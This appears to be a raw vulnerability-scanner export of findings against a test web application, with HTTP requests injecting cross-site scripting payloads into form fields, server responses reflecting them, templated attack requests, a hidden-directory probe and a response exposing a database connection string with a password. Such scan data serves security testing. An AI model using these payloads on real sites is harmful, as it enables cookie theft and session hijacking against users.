<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
POST /testing/pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=>"><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:38 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 186
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was >"><script>alert('XSS')</script>
</body>
</html>
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 166
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=>"><script>alert('XSS')</script>&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 381
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = >"><script>alert('XSS')</script></P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /linking/link1/link2/link3/link4/link5/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:28 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /test/hidden.txt HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:41:44 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:06 GMT
ETag: "aea57cfba9dc11:8f6"
Content-Length: 32
HIDDEN REFERENCE CHECKER SUCCESSGET /join.asp?name=&email=>"><script>alert("XSS")</script>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:31 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=<attack>>"><script>alert("XSS")</script></attack>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\("XSS"\)<\/script>GET /join.asp?name=&email=&surname=&house=&street=&address2=>"><script>alert('XSS')</script>&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=<attack>>"><script>alert('XSS')</script></attack>&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)<\/script>GET /login/login.asp?Action=Login&UserName=</textarea><script>alert('XSS')</script>&Password=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:53:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 363
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<h1>Invalid username: </textarea><script>alert('XSS')</script></h1>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?Action=Login&UserName=<attack></textarea><script>alert('XSS')</script></attack>&Password=333%2D333%2D3333test@test999.com <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/><var name="path"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)</script>GET /join.asp?name=&email=&surname=&house=test@<script>alert(document.cookie)</script>.com&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:37 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=<attack>test@<script>alert(document.cookie)</script>.com</attack>&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
test@<script>alert\(document\.cookie\)GET /admin/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:33 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>Directory (admin)A hidden directory has been found. This is a directory that was not encountered during the crawl phase of the scan, which indicates that it is not intended to be used by typical web users. Hidden areas of a site are of interest to attackers because they often contain sensitive information or applications.<br><br>
The admin directory most likely contains administrative applications. Administrative applications are used to manage user accounts, control site content and perform other such tasks.GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /include/common.inc HTTP/1.0
